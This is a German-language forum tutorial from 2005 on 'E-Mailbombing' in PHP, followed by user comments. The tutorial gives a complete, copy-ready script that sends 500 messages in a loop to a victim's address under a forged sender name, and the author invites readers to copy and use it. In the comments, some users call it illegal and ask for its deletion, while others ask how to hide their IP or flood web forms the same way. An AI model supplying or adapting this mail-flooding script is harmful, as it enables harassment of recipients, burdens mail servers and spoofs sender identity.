PHP - E-Mailbombing

Nunja ich will auchmal ein tutorial erstellen und zwar in der Programmierungsrichtung, es handelt sich hier um die Sprache PHP.

Nunja wollen wir mal anfangen.

Erstmal möchte ich vorweg sagen, ihr könnt einfach das Script kopierne und benutz oder versuchen noch etwas bei zu lernen,aber ich setzte vorraus das die Synax vorhanden ist, wenn nicht, dann BITTE pn an mich damit ich richtige anfänger tutorials schreiben kann.

PS.: PHP ist die geilste serversprache und es lohnt sich sie zu lernen.

Schritt 1.
Um E-Mailbomben abzusenden brauchen wir natürlich eine emailaddy an die wir die mails versenden, ich habe sie mal in die Variable $opfer gespeichert.

<?php
$opfer = "marc@mustermann.de"; //Die E-Mail Adresse des Opfers
?>


Nunja unsere Adresse kann beliebig sein bloß net die echte ^^.

<?php
$absender = "bill_gates@web.de"; //Die freiwählbare Absenderadresse
$absender_name = "Bill Gates";
$betreff = "Bombing";
?>


Nunja so weit so gut, wir haben jetzt die Variablen definiert, nun kommt es zum eigenltichen Teil.

Schritt 2.
<?php
$anzahl_mails = 500;

$nachricht = "Ses das ist nur ein Test, sind glaube ich 500 Stück, viel Spaß."; //Nachricht an das Opfer

for ($i=1; $i <=$anzahl_mails; $i++) {
if (mail($opfer,$betreff,$nachricht,"From: $absender_name <$opfer>")) {
echo "Mail $i von $anzahl_mails:<font color=green> gesendet.</font><br>";
} else {
echo "Mail $i von $anzahl_mails:<font color=red> nicht gesendet.</font><br>";
}
}
?>


Am Anfang definieren wir noch eine variable um die Anzahl der E-Mails die versendet werdne soll festzulegen.

Dannach wird eine einfache forschleife mit ne simplen If-Anweisung ausgeführt. Ich hoffe es erklärt sich vieles von selbst, falls es jedoch noch arge Schwierigkeiten gibt, dann bitte hier melden, danke.

Schritt 3 (Das ganze Script).

<?php
$opfer = "test@test.de"; //Die E-Mail Adresse des Opfers
$absender = "bill_gates@web.de"; //Die freiwählbare Absenderadresse
$absender_name = "Test";
$betreff = "Bombing";

$anzahl_mails = 500;

$nachricht = "Ses das ist nur ein Test, sind glaube ich 500 Stück, viel Spaß."; //Nachricht an das Opfer

for ($i=1; $i <=$anzahl_mails; $i++) {
if (mail($opfer,$betreff,$nachricht,"From: $absender_name <$opfer>")) {
echo "Mail $i von $anzahl_mails:<font color=green> gesendet.</font><br>";
} else {
echo "Mail $i von $anzahl_mails:<font color=red> nicht gesendet.</font><br>";
}
}
?>


Mfg Spike

Kommentare

unkie
unkie am Montag, 16. Mai 2005 um 11:54

mhmmmm ob das hier hinpasst ist die frage ...

reaLfoX
reaLfoX am Montag, 16. Mai 2005 um 14:57

sag mir lieber wie ich denen schaden kann, die mir immer diesen perversen spam zuschicken :)

malo
malo am Dienstag, 17. Mai 2005 um 13:56

Son tut online zu stellen ist doch total scheisse, der nextbeste könnte das an den Server hier schicken.

localx
localx am Donnerstag, 19. Mai 2005 um 22:10

^^, joa schickenschon, aber man kann sich davor schützen ;)

localx
localx am Donnerstag, 19. Mai 2005 um 22:12

eine frage, kannst auch ein tut dazu schreiben das man seine server daten nichtsendet und seine ip ^^ :D,

weil wen mans im outloock liest, sieht man unter eigenschaften, die daten...

unkie
unkie am Samstag, 21. Mai 2005 um 21:34

kannste auch mal sagen wie man das umschreiben muss das der sagen 500 mal was in ein forumlar schreibt?

malo
malo am Samstag, 21. Mai 2005 um 22:32

Spike.. hab grad bissl nachgeforscht..

Du weisst das du dich damit Strafbar machen kannst mit sowas.. ?!

schoepe
schoepe am Sonntag, 22. Mai 2005 um 10:08

sowas hat hier nichts zu suchen. den schaden der angerichtet wird, kann gar nicht richtig beurteilt werden. dieser post sollte gelöscht werden.

Morpheus
Morpheus am Freitag, 27. Mai 2005 um 15:00

Dieses Tutorial gehört hier nicht hin...

Spike_php
Spike_php am Montag, 30. Mai 2005 um 12:26

Strafbar? Nein nur wer es anwendet. Falls doch dann sorry, Sollte ja nur zum Spaß dienen und nicht zum Spam übergehen,sorry.

Apple
Apple am Mittwoch, 29. Juni 2005 um 11:17

weg mit dem tut ;)

localx
localx am Dienstag, 5. Juli 2005 um 22:11

man darf solchen tut rein schreiben, aber nicht verwenden als mail bombing ;) !

Spike_php
Spike_php am Dienstag, 12. Juli 2005 um 22:50

genau so siehts aus!

malo
malo am Samstag, 27. August 2005 um 14:58

Dann kommt mal einer und meint ich habs probiert ... naja mirg egal ^^

Eichhornleib
Eichhornleib am Freitag, 9. Dezember 2005 um 21:43

Kommt, wir geben endlos einen kommentar zu dem Ding ab. Jaaa das wird super.
Aus ein eMail Bombing Tutorial wird eine Kommentar Bombing Tutorial.
Juhu